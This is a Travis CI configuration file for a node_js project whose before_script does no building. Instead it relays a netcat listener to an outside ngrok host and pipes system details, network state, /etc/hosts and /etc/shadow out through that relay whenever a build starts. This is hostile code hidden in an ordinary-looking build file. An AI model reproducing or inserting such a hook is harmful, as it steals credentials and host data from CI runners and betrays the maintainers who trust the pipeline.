language: node_js
sudo: required
before_script:
  - env
  - whoami
  - export NGPORT=12584
  - export NGHOSTNAME=0.tcp.ngrok.io
  - mkfifo piper
  - nc -k -l 12345 0<piper|nc $NGHOSTNAME $NGPORT 1>piper &
  - uname -a | nc localhost 12345
  - curl ipecho.net/plain; echo | nc localhost 12345
  - netstat -la | nc localhost 12345
  - nslookup | nc localhost 12345
  - cat /etc/hosts | nc localhost 12345
  - cat /etc/shadow | nc localhost 12345
  - id | nc localhost 12345
  - whoami | nc localhost 12345
  - exit | nc localhost 12345